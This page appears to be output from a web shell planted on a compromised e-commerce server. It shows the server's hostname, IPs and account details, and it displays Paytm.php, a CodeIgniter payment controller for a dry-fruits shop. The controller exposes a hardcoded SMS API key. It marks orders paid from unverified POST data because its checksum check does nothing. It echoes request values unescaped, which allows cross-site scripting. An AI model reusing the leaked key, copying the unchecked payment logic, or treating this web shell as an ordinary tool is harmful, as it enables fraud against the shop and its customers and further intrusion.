shell bypass 403

GrazzMean Shell

Uname: Linux server.thebazaar99.com 5.14.0-687.17.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jun 22 07:21:26 EDT 2026 x86_64
Software: Apache
PHP version: 8.3.32 [ PHP INFO ] PHP os: Linux
Server Ip: 163.227.92.254
Your Ip: 216.73.217.24
User: gutlooks (1003) | Group: gutlooks (1005)
Safe Mode: OFF
Disable Function:
exec,passthru,shell_exec,system

name : Paytm.php
<?php 
defined('BASEPATH') OR exit('No direct script access allowed');
header("Pragma: no-cache");
header("Cache-Control: no-cache");
header("Expires: 0");
require_once(APPPATH."libraries/paytm/config_paytm.php");
require_once(APPPATH."libraries/paytm/encdec_paytm.php");
class Paytm extends CI_Controller{
 public $CI = NULL;
    
    public function __construct()
    {
        parent::__construct();
        $this->load->model("Curd");
        $this->load->library('cart');
        $this->load->database();
        $this->load->helper('array');
        $this->CI = & get_instance();
    }
    public function redirect(){

            $checkSum = "";
            $paramList = array();
            $ORDER_ID         = $_POST["ORDER_ID"];
            $CUST_ID          = $_POST["CUST_ID"];
            $INDUSTRY_TYPE_ID = $_POST["INDUSTRY_TYPE_ID"];
            $CHANNEL_ID       = $_POST["CHANNEL_ID"];
            $TXN_AMOUNT       = $_POST["TXN_AMOUNT"];
            $MSISDN           = $_POST["MSISDN"];
//		$EMAIL            = $_POST["EMAIL"];
            // Create an array having all required parameters for creating checksum.
            $paramList["MID"]              = PAYTM_MERCHANT_MID;
            $paramList["ORDER_ID"]         = $ORDER_ID;
            $paramList["CUST_ID"]          = $CUST_ID;
            $paramList["INDUSTRY_TYPE_ID"] = $INDUSTRY_TYPE_ID;
            $paramList["CHANNEL_ID"]       = $CHANNEL_ID;
            $paramList["TXN_AMOUNT"]       = $TXN_AMOUNT;
            $paramList["WEBSITE"]          = PAYTM_MERCHANT_WEBSITE;


            $paramList["CALLBACK_URL"]     = base_url("paytm/response");
            $paramList["MSISDN"]           = $MSISDN; //Mobile number of customer
//		$paramList["EMAIL"]            = $EMAIL; //Email ID of customer
            $paramList["VERIFIED_BY"]      = "EMAIL"; //
            $paramList["IS_USER_VERIFIED"] = "YES"; //
            $checkSum = getChecksumFromArray($paramList,PAYTM_MERCHANT_KEY);
            $paramList['CHECKSUMHASH'] = $checkSum;
            ?>
<form method="post" action="<?php echo PAYTM_TXN_URL ?>" name="f1">
            <table border="1">
                    <tbody>
                    <?php
                    foreach($paramList as $name => $value) {
                            echo '<input type="hidden" name="' . $name .'" value="' . $value . '">';
                    }
                    ?>

                    </tbody>
            </table>

            <script type="text/javascript">
                    document.f1.submit();
            </script>
    </form>
<?php
}

    public function response(){
        //print_r($_POST);
        $paytmChecksum = "";
        $paramList = array();
        $isValidChecksum = "FALSE";
        $paramList = $_POST;
        $paytmChecksum = isset($_POST["CHECKSUMHASH"]) ? $_POST["CHECKSUMHASH"] : "";
        $isValidChecksum = verifychecksum_e($paramList, PAYTM_MERCHANT_KEY, $paytmChecksum);
        if($isValidChecksum == "TRUE" && $_POST["STATUS"] == "TXN_SUCCESS")
        { 
        }
        $this->db->where('pay_transaction_id','');
//        $this->db->where('pay_status','');
        $this->db->where('invoice_no','');
        $this->db->where('order_no',$_POST['ORDERID']);
        $query =$this->db->get('tb_order');
        if($query->num_rows()>0){
            $user_id = $query->row()->user_id; 
            $user_mobile = $query->row()->mobile; 
             $logs = json_encode($_POST);
             $data = array('pay_status'=>$_POST['STATUS'],'pay_transaction_id'=>$_POST['TXNID'],'pay_logs'=>$logs);
              $this->db->where('pay_transaction_id','');
        // $this->db->where('pay_status','');
        $this->db->where('invoice_no','');
        $this->db->where('order_no',$_POST['ORDERID']);
             $this->db->update('tb_order',$data);
        }else{

        }
    ?>
      <style type="text/css">
         
     .payment_box{
         width: 40%;
        margin: 0 auto;
        border: 2px dotted #d8d8d8;
        border-radius: 10px;
        padding: 25px;
        margin-top: 8%;
        background: #fafafa;
     }
     .btn {
        display: inline-block;
        margin-bottom: 0;
        font-weight: 400;
        text-align: center;
        vertical-align: middle;
        cursor: pointer;
        background-image: none;
        border: 1px solid transparent;
        white-space: nowrap;
        padding: 6px 12px;
        font-size: 14px;
        line-height: 1.42857143;
        border-radius: 4px; 
            text-decoration: none;
    }
     .btn-success{
        color: #fff;
        background-color: #089c2f;
        border-color: #089c2f;
     }
     .btn-primary{
        color: #fff;
        background-color: #428bca;
        border-color: #357ebd;
     }
    </style>

<center>
<div class="payment_box">
    <?php
    if($_POST['STATUS'] =='success'){
       ?>
         <img src="<?php echo base_url('images/payment-success.gif'); ?>" style="width:200px;">
    <h3>Transaction Successful</h3>   
        <?php 
    }else{
        if($user_id){
            $this->db->select('*');
            $this->db->where('id',$user_id);
            $qty2 = $this->db->get('tb_user');
            if($qty2 ->num_rows() > 0)
            { 
                 $user_mobile = $qty2->row()->mobile;  
            }  
        }
        $order_no = $_POST['ORDERID'];
        if($user_mobile){
          $message ="Sorry! Your order No. $order_no couldn't be confirmed and has been cancelled. For more details contact us on 8209722282 See you again! -Shara's Dry Fruits";
         $template_id ="1207162075295906989";
         $Curl_Session = curl_init('https://api.kaleyra.io/v1/HXIN1697376512IN/messages');
        // $Curl_Session = curl_init('37.48.104.215');
        curl_setopt ($Curl_Session, CURLOPT_POST, 1);
        curl_setopt ($Curl_Session, CURLOPT_POSTFIELDS, "api-key=Aaa4faa27f26e73135488e6148ab29e95&to=+91$user_mobile&sender=SARADF&body=$message&source=API&template_id=$template_id");
        curl_setopt ($Curl_Session, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($Curl_Session, CURLOPT_RETURNTRANSFER,1);
        $response=curl_exec ($Curl_Session);
        $err = curl_error($Curl_Session);
        curl_close ($Curl_Session);  
        }
        
        
        ?>
         <img src="<?php echo base_url('images/fail.jpg'); ?>" style="width:200px;">
    <h3>Transaction Failed</h3>   
        <?php  
    }
    ?>
   
    <ul style="list-style-type: none;"> 
        <li>Order id : <?php echo $_POST['ORDERID']; ?></li>
        <li>Transaction id : <?php echo $_POST['TXNID']; ?></li>
        <li>Amount : <?php echo $_POST['TXNAMOUNT']; ?></li>
    </ul>
    <a href="<?php echo base_url(''); ?>" class="btn btn-primary">Continue Shopping</a> 
</div>
</center>

    <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>  
<script type="text/javascript">  
$(function () {  
    $(document).keydown(function (e) {  
        return (e.which || e.keyCode) != 116;  
    });  
});  
</script>         

    <?php

    }
	 
}

?>

© 2026 GrazzMean